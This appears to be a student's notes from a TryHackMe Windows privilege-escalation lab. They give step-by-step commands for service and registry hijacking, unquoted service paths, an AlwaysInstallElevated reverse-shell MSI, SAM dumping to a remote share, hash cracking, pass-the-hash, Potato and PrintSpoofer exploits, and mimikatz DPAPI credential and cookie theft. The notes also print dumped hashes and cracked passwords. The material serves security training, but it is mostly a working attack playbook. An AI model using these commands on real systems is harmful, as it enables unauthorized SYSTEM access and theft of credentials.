https://gist.github.com/sckalath/8dacd032b65404ef7411
https://steflan-security.com/windows-privilege-escalation-weak-permission/
### Insecure service permissions [overwrite]
```text
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
```
The service runs as SYSTEM; change its binpath and then start it.
![[Pasted image 20220103231130.png]]
sc qc daclsvc shows the service account is LocalSystem.
![[Pasted image 20220103231205.png]]
```text
sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\""
```
![[Pasted image 20220103231402.png]]
Answer: C:\Program Files\DACL Service\daclservice.exe
![[Pasted image 20220103231438.png]]
### Unquoted service path [overwrite]
![[Pasted image 20220103231603.png]]
Unlike the previous service, this one's binary path is not quoted.
Use accesschk.exe to check the write permissions on C:\Program Files\Unquoted Path Service\Common Files:
```text
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
```
![[Pasted image 20220103231859.png]]
We (the user account) have write access to that directory.
Overwrite unquotedpathservice.exe (in C:\Program Files\Unquoted Path Service\Common Files) with reverse.exe:
```text
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
```
![[Pasted image 20220103232236.png]]
```text
net start unquotedsvc
```
![[Pasted image 20220103232737.png]]
Question and answer:
While practising I did not understand why uploading common.exe to C:\Program Files\Unquoted Path Service\ was enough to get it run, since the unquoted path lives under C:\Program Files\Unquoted Path Service\.
So I searched and found that the path is resolved by trying locations 1 to 5 in order, as shown below, so the file only needs to be placed at any one of them; the parent directory is writable, so uploading it there is enough.
```text
To run SomeExecutable.exe, the system interprets the path in the following order, 1 to 5:
1. C:\Program.exe
2. C:\Program Files\A.exe
3. C:\Program Files\A Subfolder\B.exe
4. C:\Program Files\A Subfolder\B Subfolder\C.exe
5. C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
If C:\Program.exe is not found, C:\Program Files\A.exe is executed. If C:\Program Files\A.exe is not found, C:\Program Files\A Subfolder\B.exe is executed, and so on.
```
### Weak registry permissions
```text
sc qc regsvc
```
![[Pasted image 20220103233058.png]]
The service runs as LocalSystem.
```text
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
```
or, in PowerShell:
```text
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```
![[Pasted image 20220103234000.png]]
Note that nearly everyone can access it: NT AUTHORITY\INTERACTIVE has read/write (RW).
So we overwrite ImagePath to get a reverse shell as SYSTEM:
```text
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
```
![[Pasted image 20220103234155.png]]
### Insecure service executables [open question: need to check whether daclsvc's executable is also writable by everyone]
```text
sc qc filepermsvc
```
![[Pasted image 20220103235319.png]]
```text
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
```
The executable is writable by everyone, so replace it:
![[Pasted image 20220103235247.png]]
```text
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
net start filepermsvc
```
![[Pasted image 20220103235420.png]]
### Autorun programs
```text
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
### Installer service (AlwaysInstallElevated)
```text
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
Both are set to 1.
Generate an MSI:
```text
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.230 LPORT=53 -f msi -o reverse.msi
```
```text
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
```
### Searching the registry for passwords
```bash
reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
```
### cmdkey: viewing stored credentials
```text
cmdkey /list
runas /user:admin /savecred cmd or reverse.exe
```
![[Pasted image 20220105181132.png]]
### SAM
```text
C:\Windows\Repair\SAM
copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM
```
```text
git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM
```
![[Pasted image 20220105182956.png]]
```text
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
```
```bash
hashcat -m 1000 hash_test /usr/share/wordlists/rockyou.txt --show --username
```
![[Pasted image 20220105183141.png]]
```text
Administrator:fc525c9683e8fe067095ba2ddc971889:Passw0rd!
Guest:31d6cfe0d16ae931b73c59d7e0c089c0:
DefaultAccount:31d6cfe0d16ae931b73c59d7e0c089c0:
user:91ef1073f6ae95f5ea6ace91c09a963a:password321
admin:a9fdfa038c4b75ebc76dc855dd74f0da:password123
```
```bash
impacket-psexec [email protected] -hashes a9fdfa038c4b75ebc76dc855dd74f0da:a9fdfa038c4b75ebc76dc855dd74f0da
```
![[Pasted image 20220105184217.png]]
```text
python ms14-068.py -u [email protected] -s S-1-5-21-3025105784-3259396213-1915610826-500 -d DC01
```
### Viewing scheduled tasks
```text
schtasks /query /fo LIST
```
```text
schtasks /query /fo LIST /tn Cleanup
schtasks /query /fo LIST /v | findstr "Task To Run:"
SharPersist.exe -t schtask -m list    # good tool, it really works
```
### Printer privilege escalation: printspoof.exe
```
printspoof.exe -i -c cmd.exe | reverse.exe
```
![[Pasted image 20220105221154.png]]
### Insecure application UI
![[Pasted image 20220105222025.png]]
- ![[Pasted image 20220105222055.png]]
```text
file://c:/windows/system32/cmd.exe
```
- ![[Pasted image 20220105222228.png]]
### Rogue Potato
If the machine is >= Windows 10 1809 / Windows Server 2019: try Rogue Potato.
If the machine is < Windows 10 1809 / < Windows Server 2019: try Juicy Potato.
```text
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.127.236:9999
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe   # gives a shell as LOCAL SERVICE; continue from there, because the potato needs LOCAL SERVICE / NETWORK SERVICE etc.
C:\PrivEsc\RoguePotato.exe -r 10.9.1.66 -e "C:\PrivEsc\reverse.exe" -l 9999   # gives a SYSTEM shell
```
![[Pasted image 20220105225813.png]]
Note: this requires the **SeImpersonatePrivilege** privilege (LOCAL|NETWORK SERVICE),
and SeAssignPrimaryTokenPrivilege for SYSTEM privilege.
![[Pasted image 20220105231151.png]]
### Everything else
```text
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dpapi-extracting-passwords
sekurlsa::dpapi
dpapi::chrome /in:"c:tempCookies" /masterkey:<masterkey value from the screenshot above> /unprotect
```
#### dpapi-1
```text
dpapi::cred /in:"C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D" /masterkey:ced3b33f-849e-4587-8829-fbaf4cd747a7
```
#### Practice machine
[TryHackMe | Windows PrivEsc](https://tryhackme.com/room/windows10privesc)